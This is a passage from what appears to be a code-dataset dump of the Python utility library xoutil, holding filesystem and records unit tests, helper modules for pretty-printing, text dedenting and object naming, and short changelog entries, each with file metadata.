sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__),\n# '..', '..')))\n\n\nclass TestFs(unittest.TestCase):\n def setUp(self):\n # Makes all names predictable\n pjoin = os.path.join\n self.previous_dir = os.getcwd()\n self.base = base = tempfile.mkdtemp(prefix=\"xoutiltests-\")\n os.makedirs(pjoin(base, \"A\", \"B\", \"C\"))\n os.makedirs(pjoin(base, \"A\", \"D\", \"E\"))\n os.makedirs(pjoin(base, \"A\", \"F\"))\n self.files = files = []\n\n wexpected = self.walk_up_expected = pjoin(self.base, \"A\")\n sentinel = tempfile.mkstemp(prefix=\"X\", dir=wexpected)\n self.sentinel = os.path.basename(sentinel[-1])\n files.append(sentinel) # For testing `walk_up`\n files.append(\n tempfile.mkstemp(prefix=\"M\", dir=pjoin(self.base, \"A\", \"B\"))\n )\n files.append(\n tempfile.mkstemp(prefix=\"P\", dir=pjoin(self.base, \"A\", \"B\"))\n )\n wstart = self.walk_up_start = pjoin(self.base, \"A\", \"B\", \"C\")\n files.append(tempfile.mkstemp(prefix=\"z\", dir=wstart))\n files.append(\n tempfile.mkstemp(suffix=\"ending\", dir=pjoin(self.base, \"A\", \"D\"))\n )\n files.append(\n tempfile.mkstemp(prefix=\"Z\", dir=pjoin(self.base, \"A\", \"F\"))\n )\n\n def test_iter_files_with_regex_pattern(self):\n from xoutil.fs import iter_files\n\n res = list(iter_files(self.base, \"(?xi)/Z\"))\n self.assertEqual(2, len(res))\n self.assertIn(self.files[-3][-1], res)\n self.assertIn(self.files[-1][-1], res)\n\n def test_iter_files_with_maxdepth(self):\n from xoutil.fs import iter_files\n\n res = list(iter_files(self.base, \"(?xi)/Z\", maxdepth=3))\n self.assertEqual(1, len(res))\n self.assertIn(self.files[-1][-1], res)\n res = list(iter_files(self.base, \"(?xi)/Z\", maxdepth=2))\n self.assertEqual(0, len(res))\n\n def test_walk_up(self):\n from xoutil.fs import walk_up\n\n expected, start = self.walk_up_expected, self.walk_up_start\n sentinel = self.sentinel\n self.assertEqual(expected, walk_up(start, sentinel))\n\n def test_ensure_filename(self):\n from xoutil.fs import ensure_filename\n\n filename = os.path.join(self.base, \"en\", \"sure\", \"filename.txt\")\n ensure_filename(filename)\n self.assertTrue(os.path.isfile(filename))\n\n def tearDown(self):\n shutil.rmtree(self.base)\n os.chdir(self.previous_dir)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5686274766921997, "alphanum_fraction": 0.5732410550117493, "avg_line_length": 23.08333396911621, "blob_id": "f2a5971b7c3f2ec0a4a125f18ca2ecdad4550c7f", "content_id": "5932d7834b65cd9af5104961684b402b9fff13d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 868, "license_type": "no_license", "max_line_length": 72, "num_lines": 36, "path": "/xotl/tools/future/pprint.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Enhanced data pretty printer.\"\"\"\n\nfrom pprint import * # noqa\nfrom pprint import __all__, pprint # noqa\n\n__all__ = list(__all__) + [\"ppformat\"]\n\n\ndef ppformat(obj):\n \"\"\"Just like `pprint`:func: but always returning a result.\n\n :returns: The pretty formated text.\n :rtype: `unicode` in Python 2, `str` in Python 3.\n\n \"\"\"\n import io\n\n stream = io.StringIO()\n pprint(obj, stream=stream)\n stream.seek(0)\n res = stream.read()\n if isinstance(res, str):\n return res\n else:\n from xotl.tools.future.codecs import safe_decode\n\n return safe_decode(res)\n" }, { "alpha_fraction": 0.70652174949646, "alphanum_fraction": 0.717391312122345, "avg_line_length": 35.79999923706055, "blob_id": "f7c1bfa953bde96644893b6447a63216b46e2508", "content_id": "58002ba90b9f7ca037b74e7b0a14ba4bb85fb573", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 184, "license_type": "permissive", "max_line_length": 75, "num_lines": 5, "path": "/docs/source/history/_changes-1.7.10.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix bug #6: `TimeSpan.overlaps <xoutil.datetime.TimeSpan.overlaps>`:meth:\n was incorrectly defined.\n\n- Fix bug #5: `~xoutil.datetime.TimeSpan`:class: can't have a `union`\n method.\n" }, { "alpha_fraction": 0.727215588092804, "alphanum_fraction": 0.727215588092804, "avg_line_length": 32.8510627746582, "blob_id": "aa98c944a4dfe881206475423f683136e29a15ab", "content_id": "4c74adedfc9be95789a50da4222e58820721ea21", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1591, "license_type": "permissive", "max_line_length": 78, "num_lines": 47, "path": "/docs/source/history/_changes-2.1.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Repackage ``xoutil`` under `xotl.tools`:mod:. You can still import from the\n `xoutil namespace<xoutil>`:mod:.\n\n- Remove deprecated module ``xoutil.logger``.\n\n- Remove package ``xoutil.eight``.\n\n- Remove deprecated ``xoutil.decorator.memoized_property``, use\n `xotl.tools.objects.memoized_property`:class:.\n\n- Remove deprecated functions and classes ``xoutil.future.inspect.type_name``,\n ``xoutil.future.functools.ctuple``, and ``xoutil.future.functools.compose``.\n\n- Remove deprecated top-level imports: ``xoutil.Unset``, ``xoutil.Undefined``,\n ``xoutil.Ignored`` and ``xoutil.Invalid``.\n\n- Add `xotl.tools.deprecation.deprecated_alias`:func:.\n\n- Allow to customize Quantity in `xotl.tools.dim.meta.Dimension`:class: and,\n by argument, in `~xotl.tools.dim.meta.Dimension.new`:meth:.\n\n- Deprecate ``xoutil.future.itertools.zip()``, and\n ``xoutil.future.itertools.map()``.\n\n- Re-implement `xotl.tools.future.itertools.merge`:func: in terms of\n `heapq.merge`:func:.\n\n- Add `xotl.tools.tasking.get_backoff_wait`:func:\n\n- Add `xotl.tools.objects.iter_final_subclasses`:func:,\n `xotl.tools.objects.get_final_subclasses`:func: and\n `xotl.tools.objects.FinalSubclassEnumeration`:func:.\n\n- Deprecate module ``xotl.tools.progress``.\n\n- Deprecate module ``xotl.tools.values.ids``.\n\n- Deprecate ``xotl.tools.web.slugify``; use `xotl.tools.strings.slugify`:func:\n instead.\n\n- Remove deprecated module ``xotl.tools.uuid``.\n\n- Remove deprecated module ``xotl.tool.logical``.\n\n- Remove deprecated module ``xotl.tools.formatter``.\n\n- Remove deprecated function ``xotl.tools.tools.get_default``.\n" }, { "alpha_fraction": 0.6033898591995239, "alphanum_fraction": 0.6081355810165405, "avg_line_length": 30.382978439331055, "blob_id": "ed3d0b5f8ab103369820d4e7505226e758671afc", "content_id": "8cc94f583ae9ba9809785ef12362b998edf0fb60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1480, "license_type": "no_license", "max_line_length": 78, "num_lines": 47, "path": "/xotl/tools/future/textwrap.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Text wrapping and filling.\"\"\"\n\nfrom textwrap import * # noqa\nimport textwrap as _stdlib\nfrom textwrap import __all__ # noqa\n\n__all__ = list(__all__)\n\n\ndef dedent(text, skip_firstline=False):\n r\"\"\"Remove any common leading whitespace from every line in text.\n\n This can be used to make triple-quoted strings line up with the left edge\n of the display, while still presenting them in the source code in indented\n form.\n\n Note that tabs and spaces are both treated as whitespace, but they are not\n equal: the lines ``\"    hello\"`` and ``\"\\thello\"`` are considered to have\n no common leading whitespace.\n\n If `skip_firstline` is True, the first line is separated from the rest of\n the body. This helps with docstrings that follow `257`:pep:.\n\n .. warning:: The `skip_firstline` argument is missing in standard library.\n\n \"\"\"\n if skip_firstline:\n parts = text.split(\"\\n\", 1)\n if len(parts) > 1:\n subject, body = parts\n else:\n subject, body = parts[0], \"\"\n result = _stdlib.dedent(subject)\n if body:\n result += \"\\n\" + _stdlib.dedent(body)\n else:\n result = _stdlib.dedent(text)\n return result\n" }, { "alpha_fraction": 0.6931818127632141, "alphanum_fraction": 0.6931818127632141, "avg_line_length": 43, "blob_id": "77e76c55572c02d3181f9c79346abbc0eb5fadc2", "content_id": "3db59a148cf3524fa3f8d3cd6c8eb0d21b549141", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 88, "license_type": "permissive", "max_line_length": 74, "num_lines": 2, "path": "/docs/source/history/_changes-1.6.10.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix `repr`:func: and `str`:func: issues with `xoutil.cli.Command`:class:\n instances.\n" }, { "alpha_fraction": 0.5645127296447754, "alphanum_fraction": 0.5682082176208496, "avg_line_length": 30.622705459594727, "blob_id": "bb7b6f7920beae76dfc24e355b2dbaeec1577797", "content_id": "4d25ae99355b97cae6765dbb342a35918bce570e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18943, "license_type": "no_license", "max_line_length": 82, "num_lines": 599, "path": "/xotl/tools/names.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"A protocol to obtain or manage object names.\"\"\"\n\n# FIX: These imports must be local\nfrom xotl.tools.symbols import Undefined as _undef\n\n\n# TODO: This module must be reviewed and deprecate most of it.\n\n\ndef _get_mappings(source):\n \"\"\"Return a sequence of mappings from `source`.\n\n Source could be a stack frame, a single dictionary, or any sequence of\n dictionaries.\n\n \"\"\"\n from collections import Mapping\n\n if isinstance(source, Mapping):\n return (source,)\n else:\n from xotl.tools.future.inspect import get_attr_value\n\n l = get_attr_value(source, \"f_locals\", _undef)\n g = get_attr_value(source, \"f_globals\", _undef)\n if isinstance(l, Mapping) and isinstance(g, Mapping):\n return (l,) if l is g else (l, g)\n else:\n return tuple(source)\n\n\ndef _key_for_value(source, value, strict=True):\n \"\"\"Returns the tuple (key, mapping) where the \"value\" is found.\n\n if strict is True, then look first for the same object::\n >>> x = [1]\n >>> y = [1] # equal to `x` but not the same\n >>> src = {'x': x, 'y': y}\n >>> search = lambda o, strict=True: _key_for_value(src, o, strict)\n >>> search(x) == search(y)\n False\n >>> search(x, strict=False) == search(y, strict=False)\n True\n\n This is mainly intended to find object names in stack frame variables.\n\n Source could be a stack frame, a single dictionary, or any sequence of\n dictionaries.\n\n \"\"\"\n source = _get_mappings(source)\n found, equal = _undef, (None, {})\n i, mapping_count = 0, len(source)\n while found is _undef and (i < mapping_count):\n mapping = source[i]\n keys = list(mapping)\n j, key_count = 0, len(keys)\n while found is _undef and (j < key_count):\n key = keys[j]\n item = mapping[key]\n if item is value:\n found = key, mapping\n elif value == item:\n if strict:\n equal = key, mapping\n else:\n found = key, mapping\n j += 1\n i += 1\n return found if found is not _undef else equal\n\n\ndef _get_value(source, key, default=None):\n \"\"\"Returns the value for the given `key` in `source` mappings.\n\n This is mainly intended to obtain object values in stack frame variables.\n\n Source could be a stack frame, a single dictionary, or any sequence of\n dictionaries.\n\n \"\"\"\n source = _get_mappings(source)\n res = _undef\n i, mapping_count = 0, len(source)\n while res is _undef and (i < mapping_count):\n mapping = source[i]\n res = mapping.get(key, _undef)\n i += 1\n return res if res is not _undef else default\n\n\ndef _get_best_name(names, safe=False, full=False):\n \"\"\"Get the best name in the give list of `names`.\n\n Best names are chosen in the following order (from worst to best):\n\n - Any string\n - A valid slug\n - A valid protected identifier\n - A valid public identifier\n - A valid full identifier\n\n If a string in the list `names` contains the substring \"%(next)s\", then\n the algorithm recurses to find the best name of the remaining names first\n and substitutes the substring with the result, the remaining names are\n then pruned from the search.\n\n If `safe` is True, returned name must be a valid identifier. If `full` is\n True (halted if `safe` is not True) then the returned name must a valid\n full identifier.\n\n \"\"\"\n from xotl.tools.validators import (\n is_valid_full_identifier,\n is_valid_public_identifier,\n is_valid_identifier,\n is_valid_slug,\n )\n\n names = list(names)\n\n def inner(start=0):\n ok, best_idx, best_qlty = start, -1, 0\n i, count = start, len(names)\n assert start < count, 'start is \"%s\", max is \"%s\".' % (start, count)\n while i < count:\n name = names[i]\n if \"%(next)s\" in name:\n next = inner(i + 1)\n names[i] = name % {\"next\": next}\n count = i + 1\n else:\n if is_valid_slug(name):\n qlty = 25\n if is_valid_identifier(name):\n qlty = 75 if is_valid_public_identifier(name) else 50\n elif is_valid_full_identifier(name):\n qlty = 100\n else:\n qlty = -25\n if best_qlty <= qlty:\n best_idx = i\n best_qlty = qlty\n ok = i\n i += 1\n idx = best_idx if best_idx >= 0 else ok\n return names[idx]\n\n res = inner()\n if safe:\n # TODO: Improve these methods to return False of reserved identifiers\n is_valid = is_valid_full_identifier if full else is_valid_identifier\n if not is_valid(res):\n from xotl.tools.string import slugify\n\n _mark = \"dot_dot_dot\"\n full = full and \".\" in res\n if full:\n res = res.replace(\".\", _mark)\n res = slugify(res, \"_\")\n if full:\n res = res.replace(_mark, \".\")\n if not is_valid(res):\n res = \"_\" + res\n return str(res)\n\n\ndef module_name(item):\n \"\"\"Returns the full module name where the given object is declared.\n\n Examples::\n\n >>> module_name(module_name)\n 'xotl.tools.names'\n\n >>> from xotl.tools.symbols import Unset\n >>> module_name(Unset)\n 'xotl.tools.symbols'\n\n \"\"\"\n from xotl.tools.future.inspect import get_attr_value\n\n if item is None:\n res = \"\"\n elif isinstance(item, str):\n res = item\n else:\n res = get_attr_value(item, \"__module__\", None)\n if res is None:\n res = get_attr_value(type(item), \"__module__\", \"\")\n if res.startswith(\"__\") or res in (\"builtins\", \"exceptions\", \"<module>\"):\n res = \"\"\n return str(res)\n\n\ndef simple_name(item, join=True):\n \"\"\"Returns the simple name for the given object.\n\n :param join: If False, only the object inner name is returned; if it is a\n callable is used similar to a string join receiving a tuple of\n (module-name, inner-name) as argument; True means (is equivalent\n to)::\n\n join = lambda arg: '.'.join(arg).strip('.')\n\n For example, use ``lambda arg: arg`` to return the 2-tuple itself.\n\n See `module_name`:func: for more information when a not False value\n is used.\n\n Examples::\n\n >>> simple_name(simple_name)\n 'xotl.tools.names.simple_name'\n\n >>> from xotl.tools.symbols import Unset\n >>> simple_name(Unset)\n 'xotl.tools.symbols.Unset'\n\n This function is intended for named objects (those with the `__name__`\n attribute), if an object without standard name is used, the type name is\n returned instead; for example::\n\n >>> simple_name(0)\n 'int'\n\n To get a name in a more precise way, use `nameof`:func:.\n\n \"\"\"\n # TODO: deprecate `join` argument\n from xotl.tools.future.inspect import safe_name\n\n singletons = (None, True, False, Ellipsis, NotImplemented)\n res = next((str(s) for s in singletons if s is item), None)\n if res is None:\n res = safe_name(item)\n if res is None:\n item = type(item)\n res = safe_name(item)\n if join:\n if join is True:\n\n def join(arg):\n return str(\".\".join(arg).strip(\".\"))\n\n res = join((module_name(item), res))\n return res\n\n\ndef nameof(*args, **kwargs):\n \"\"\"Obtain the name of each one of a set of objects.\n\n .. versionadded:: 1.4.0\n\n .. versionchanged:: 1.6.0\n\n - Keyword arguments are now keyword-only arguments.\n\n - Support for several objects\n\n - Improved the semantics of parameter `full`.\n\n - Added the `safe` keyword argument.\n\n If no object is given, None is returned; if only one object is given, a\n single string is returned; otherwise a list of strings is returned.\n\n The name of an object is normally the variable name in the calling stack.\n\n If the object is not present calling frame, up to five frame levels are\n searched. Use the `depth` keyword argument to specify a different\n starting point and the search will proceed five levels from this frame up.\n\n If the same object has several good names a single one is arbitrarily\n chosen.\n\n Good names candidates are retrieved based on the keywords arguments\n `full`, `inner`, `safe` and `typed`.\n\n If `typed` is True and the object is not a type name or a callable (see\n `xotl.tools.future.inspect.safe_name`:func:), then the `type` of the\n object is used instead.\n\n If `inner` is True we try to extract the name by introspection instead of\n looking for the object in the frame stack.\n\n If `full` is True the full identifier of the object is preferred. In this\n case if `inner` is False the local-name for the object is found. If\n `inner` is True, find the import-name.\n\n If `safe` is True, returned value is converted -if it is not- into a valid\n Python identifier, though you should not trust this identifier resolves to\n the value.\n\n See `the examples in the documentation <name-of-narrative>`:ref:.\n\n .. warning:: The names of objects imported from 'xoutil' are still in the\n namespace 'xotl.tools'.\n\n \"\"\"\n # XXX: The examples are stripped from here. Go the documentation page.\n from numbers import Number\n from xotl.tools.future.inspect import safe_name\n\n arg_count = len(args)\n names = [[] for i in range(arg_count)]\n\n params = kwargs\n idx = 0\n\n def grant(name=None, **again):\n nonlocal params\n nonlocal idx\n if name:\n names[idx].append(name)\n assert len(names[idx]) < 5\n if again:\n params = dict(kwargs, **again)\n else:\n params = kwargs\n idx += 1\n\n def param(name, default=False):\n nonlocal params\n return params.get(name, default)\n\n while idx < arg_count:\n item = args[idx]\n if param(\"typed\") and not safe_name(item):\n item = type(item)\n if param(\"inner\"):\n res = safe_name(item)\n if res:\n if param(\"full\"):\n head = module_name(item)\n if head:\n res = \".\".join((head, res))\n grant(res)\n elif isinstance(item, (str, Number)):\n grant(str(item))\n else:\n grant(\"@\".join((\"%(next)s\", hex(id(item)))), typed=True)\n else:\n import sys\n\n sf = sys._getframe(param(\"depth\", 1))\n try:\n i, LIMIT, res = 0, 5, _undef\n _full = param(\"full\")\n while not res and sf and (i < LIMIT):\n key, mapping = _key_for_value(sf, item)\n if key and _full:\n head = module_name(_get_value(mapping, \"__name__\"))\n if not head:\n head = module_name(sf.f_code.co_name)\n if not head:\n head = module_name(item) or None\n else:\n head = None\n if key:\n res = key\n else:\n sf = sf.f_back\n i += 1\n finally:\n # TODO: on \"del sf\" Python says \"SyntaxError: can not delete\n # variable 'sf' referenced in nested scope\".\n sf = None\n if res:\n grant(\".\".join((head, res)) if head else res)\n else:\n res = safe_name(item)\n if res:\n grant(res)\n else:\n grant(None, inner=True)\n for i in range(arg_count):\n names[i] = _get_best_name(names[i], safe=param(\"safe\"))\n if arg_count == 0:\n return None\n elif arg_count == 1:\n return names[0]\n else:\n return names\n\n\ndef identifier_from(*args):\n \"\"\"Build an valid identifier from the name extracted from an object.\n\n .. versionadded:: 1.5.6\n\n First, check if argument is a type and then returns the name of the type\n prefixed with `_` if valid; otherwise calls `nameof` function repeatedly\n until a valid identifier is found using the following order logic:\n ``inner=True``, without arguments looking-up a variable in the calling\n stack, and ``typed=True``. Returns None if no valid value is found.\n\n Examples::\n\n >>> identifier_from({})\n 'dict'\n\n \"\"\"\n if len(args) == 1:\n from xotl.tools.validators.identifiers import is_valid_identifier as valid\n from xotl.tools.future.inspect import get_attr_value\n\n res = None\n if isinstance(args[0], type):\n aux = get_attr_value(args[0], \"__name__\", None)\n if valid(aux):\n res = str(\"_%s\" % aux)\n if res is None:\n tests = ({\"inner\": True}, {}, {\"typed\": True})\n names = (nameof(args[0], depth=2, **test) for test in tests)\n res = next((name for name in names if valid(name)), None)\n return res\n else:\n msg = \"identifier_from() takes exactly 1 argument (%s given)\"\n raise TypeError(msg % len(args))\n\n\nclass namelist(list):\n \"\"\"Similar to list, but only intended for storing object names.\n\n Constructors:\n\n * namelist() -> new empty list\n * namelist(collection) -> new list initialized from collection's items\n * namelist(item, ...) -> new list initialized from severals items\n\n Instances can be used as decorators to store names of module items\n (functions or classes)::\n\n >>> __all__ = namelist()\n >>> @__all__\n ... def foobar(*args, **kwargs):\n ... 'Automatically added to this module \"__all__\" names.'\n\n >>> 'foobar' in __all__\n True\n\n \"\"\"\n\n def __init__(self, *args):\n if len(args) == 1:\n from types import GeneratorType as gtype\n\n if isinstance(args[0], (tuple, list, set, frozenset, gtype)):\n args = args[0]\n super().__init__(nameof(arg, depth=2) for arg in args)\n\n def __add__(self, other):\n other = [nameof(item, depth=2) for item in other]\n return super().__add__(other)\n\n __iadd__ = __add__\n\n def __contains__(self, item):\n return super().__contains__(nameof(item, inner=True))\n\n def append(self, value):\n \"\"\"l.append(value) -- append a name object to end\"\"\"\n super().append(nameof(value, depth=2))\n return value # What allow to use its instances as a decorator\n\n __call__ = append\n\n def extend(self, items):\n \"\"\"l.extend(items) -- extend list by appending items from the iterable\n \"\"\"\n items = (nameof(item, depth=2) for item in items)\n return super().extend(items)\n\n def index(self, value, *args):\n \"\"\"l.index(value, [start, [stop]]) -> int -- return first index of name\n\n Raises ValueError if the name is not present.\n\n \"\"\"\n return super().index(nameof(value, depth=2), *args)\n\n def insert(self, index, value):\n \"\"\"l.insert(index, value) -- insert object before index\n \"\"\"\n return super().insert(index, nameof(value, depth=2))\n\n def remove(self, value):\n \"\"\"l.remove(value) -- remove first occurrence of value\n\n Raises ValueError if the value is not present.\n\n \"\"\"\n return list.remove(self, nameof(value, depth=2))\n\n\nclass strlist(list):\n \"\"\"Similar to list, but only intended for storing ``str`` instances.\n\n Constructors:\n * strlist() -> new empty list\n * strlist(collection) -> new list initialized from collection's items\n * strlist(item, ...) -> new list initialized from severals items\n\n Last versions of Python 2.x has a feature to use unicode as standard\n strings, but some object names can be only ``str``. To be compatible with\n Python 3.x in an easy way, use this list.\n\n \"\"\"\n\n def __init__(self, *args):\n if len(args) == 1:\n from types import GeneratorType as gtype\n\n if isinstance(args[0], (tuple, list, set, frozenset, gtype)):\n args = args[0]\n super().__init__(str(arg) for arg in args)\n\n def __add__(self, other):\n other = [str(item) for item in other]\n return super().__add__(other)\n\n __iadd__ = __add__\n\n def __contains__(self, item):\n return super().__contains__(str(item))\n\n def append(self, value):\n \"\"\"l.append(value) -- append a name object to end\"\"\"\n super().append(str(value))\n return value # What allow to use its instances as a decorator\n\n __call__ = append\n\n def extend(self, items):\n \"\"\"l.extend(items) -- extend list by appending items from the iterable\n \"\"\"\n items = (str(item) for item in items)\n return super().extend(items)\n\n def index(self, value, *args):\n \"\"\"l.index(value, [start, [stop]]) -> int -- return first index of name\n\n Raises ValueError if the name is not present.\n\n \"\"\"\n return super().index(str(value), *args)\n\n def insert(self, index, value):\n \"\"\"l.insert(index, value) -- insert object before index\n \"\"\"\n return super().insert(index, str(value))\n\n def remove(self, value):\n \"\"\"l.remove(value) -- remove first occurrence of value\n\n Raises ValueError if the value is not present.\n\n \"\"\"\n return list.remove(self, str(value))\n\n\n# Theses tests need to be defined in this module to test relative imports.\n# Otherwise the `tests/` directory would need to be a proper package.\n\nimport unittest as _utest\nfrom xotl.tools.symbols import Unset as _Unset # Use a tier 0 module!\n\n\nclass TestRelativeImports(_utest.TestCase):\n RelativeUnset = _Unset\n AbsoluteUndefined = _undef\n\n def test_relative_imports(self):\n self.assertEquals(nameof(self.RelativeUnset), \"_Unset\")\n self.assertEquals(nameof(self.RelativeUnset, inner=True), \"Unset\")\n\n # Even relative imports are resolved properly with `full=True`\n self.assertEquals(\n nameof(self.RelativeUnset, full=True), \"xotl.tools.names._Unset\"\n )\n\n self.assertEquals(\n nameof(self.AbsoluteUndefined, full=True), \"xotl.tools.names._undef\"\n )\n\n\n# Don't delete the _Unset name, so that the nameof inside the test could find\n# them in the module.\ndel _utest\n" }, { "alpha_fraction": 0.7148846983909607, "alphanum_fraction": 0.7274633049964905, "avg_line_length": 42.3636360168457, "blob_id": "4268e20f0aa58ceb25886664380639d5d5085fd0", "content_id": "545c09fdad473c5f5a2a67e61b0b6da5ffa4631a", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 477, "license_type": "permissive", "max_line_length": 77, "num_lines": 11, "path": "/docs/source/history/_changes-1.5.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Now `xoutil` supports Python 2.7, and 3.1+. Python 3.0 was not tested.\n\n- Added a `strict` parameter to `xoutil.objects.smart_getter`:func:.\n\n- New function `xoutil.objects.get_traverser`:func:.\n\n- The function `xoutil.cli.app.main`:func: prefers its `default` parameter\n instead of the application's default command.\n\n Allow the `xoutil.cli.Command`:class: to define a ``command_cli_name`` to\n change the name of the command. See `xoutil.cli.tools.command_name`:func:.\n" }, { "alpha_fraction": 0.5646013021469116, "alphanum_fraction": 0.5894628167152405, "avg_line_length": 29.562992095947266, "blob_id": "eaa7c56ce74d032261cbd5162178f01c2dd70044", "content_id": "b59be3d02c08042ff61ea4c287feb2109292998f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7764, "license_type": "no_license", "max_line_length": 78, "num_lines": 254, "path": "/tests/test_records.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\nimport unittest\nfrom mock import patch\nfrom datetime import datetime, date\n\nfrom xoutil.records import record, datetime_reader, date_reader\n\nfrom hypothesis import given\nfrom hypothesis.strategies import composite, text, integers, datetimes\n\n\nFMT = \"%Y-%m-%d\"\n\n\nclass _table(record):\n ID = 0\n _id_reader = lambda val: int(val)\n\n\nclass person(_table):\n NAME = 1\n LASTNAME = 2\n BIRTHDATE = 3\n\n _birthdate_reader = datetime_reader(\"%Y-%m-%d\")\n\n @property\n def current_age(self):\n from datetime import datetime\n\n today = datetime.today()\n return self.age_when(today)\n\n def age_when(self, today):\n res = today - self.birthdate\n return int(res.days // 365.25)\n\n\nMIN_DATE = datetime(1920, 1, 1)\nMAX_DATE = datetime(2007, 12, 31)\n\n\n@composite\ndef persons(draw):\n id = draw(integers())\n name = draw(text())\n lastname = draw(text())\n birthday = draw(datetimes(MIN_DATE, MAX_DATE)).strftime(FMT)\n return (\n (id, name, lastname, birthday),\n person((id, name, lastname, birthday)),\n )\n\n\nclass TestRecords(unittest.TestCase):\n def test_records(self):\n from datetime import datetime\n\n _manu = (\"1\", \"Manuel\", \"Vazquez\", \"1978-10-21\")\n manu = person(_manu)\n\n self.assertEqual(1, person.get_field(_manu, person.ID))\n self.assertEqual(1, manu.id)\n self.assertEqual(11, manu.age_when(datetime(1989, 10, 21)))\n self.assertEqual(35, manu.age_when(datetime(2014, 9, 22)))\n\n @given(p=persons())\n def test_record(self, p):\n r, p = p\n self.assertEqual(r[0], person.get_field(r, person.ID))\n self.assertEqual(r[0], p.id)\n self.assertEqual(r[1], p.name)\n self.assertEqual(r[2], p.lastname)\n self.assertEqual(r[3], p.birthdate.strftime(FMT))\n\n def test_descriptor(self):\n class INVOICE(record):\n ID = 0\n REFERER = 1\n\n # The following attribute will be overwritten by the fields\n # descriptor for REFERER.\n referer = \"overwritten\"\n\n assert INVOICE.referer and INVOICE.id\n line = (1, \"MVA.98\")\n self.assertEqual(INVOICE.get_field(line, INVOICE.ID), 1)\n invoice = INVOICE(line)\n self.assertEqual(invoice.referer, \"MVA.98\")\n self.assertEqual(invoice[INVOICE.REFERER], invoice.referer)\n\n def test_readers(self):\n from datetime import datetime, timedelta\n\n class INVOICE(record):\n ID = 0\n REFERER = 1\n CREATED_DATETIME = 2\n UPDATE_DATETIME = 3\n _DATETIME_FORMAT = \"%Y-%m-%d %H:%M:%S.%f\"\n\n @staticmethod\n def _created_datetime_reader(value):\n return datetime.strptime(value, INVOICE._DATETIME_FORMAT)\n\n # implicit staticmethod\n def _update_datetime_reader(value):\n return datetime.strptime(value, INVOICE._DATETIME_FORMAT)\n\n today = datetime.now()\n yesterday = today - timedelta(days=1)\n tomorrow = today + timedelta(days=1)\n line = (\n 1,\n \"MVA.98\",\n yesterday.strftime(INVOICE._DATETIME_FORMAT),\n tomorrow.strftime(INVOICE._DATETIME_FORMAT),\n )\n self.assertEqual(\n INVOICE.get_field(line, INVOICE.CREATED_DATETIME), yesterday\n )\n self.assertEqual(\n INVOICE.get_field(line, INVOICE.UPDATE_DATETIME), tomorrow\n )\n\n invoice = INVOICE(line)\n self.assertEqual(invoice.created_datetime, yesterday)\n self.assertEqual(invoice.update_datetime, tomorrow)\n\n def test_default_values(self):\n from xoutil.records import float_reader\n\n class LINE(record):\n DEBIT = \"Debit\"\n CREDIT = \"Credit\"\n _debit_reader = float_reader(nullable=True, default=0)\n _credit_reader = float_reader(nullable=True)\n\n nodata = {}\n partialdata = {\"Credit\": 0}\n nulls = {\"Debit\": \"\"}\n self.assertEqual(LINE.get_field(nodata, LINE.DEBIT), 0)\n self.assertIsNone(LINE.get_field(nodata, LINE.CREDIT))\n self.assertEqual(LINE.get_field(partialdata, LINE.DEBIT), 0)\n self.assertEqual(LINE.get_field(partialdata, LINE.CREDIT), 0)\n self.assertEqual(LINE.get_field(nulls, LINE.DEBIT), 0)\n\n\nclass TestDateTimeReader(unittest.TestCase):\n def setUp(self):\n # clear lru caches for each test... Needed so that imports done inside\n # datetime_reader are mockable.\n datetime_reader.cache_clear()\n\n def test_strict(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(FMT)\n\n inst = rec([\"2014-12-17\"])\n self.assertEqual(\"2014-12-17\", inst.moment.strftime(FMT))\n\n inst = rec([\"201-12-17\"])\n with self.assertRaises(ValueError):\n self.assertEqual(\"201-12-17\", inst.moment.strftime(FMT))\n\n def test_relaxed_but_nonnullable_with_dateutil(self):\n class rec(record):\n MOMENT = 0\n _moment_reader = datetime_reader(\n FMT, 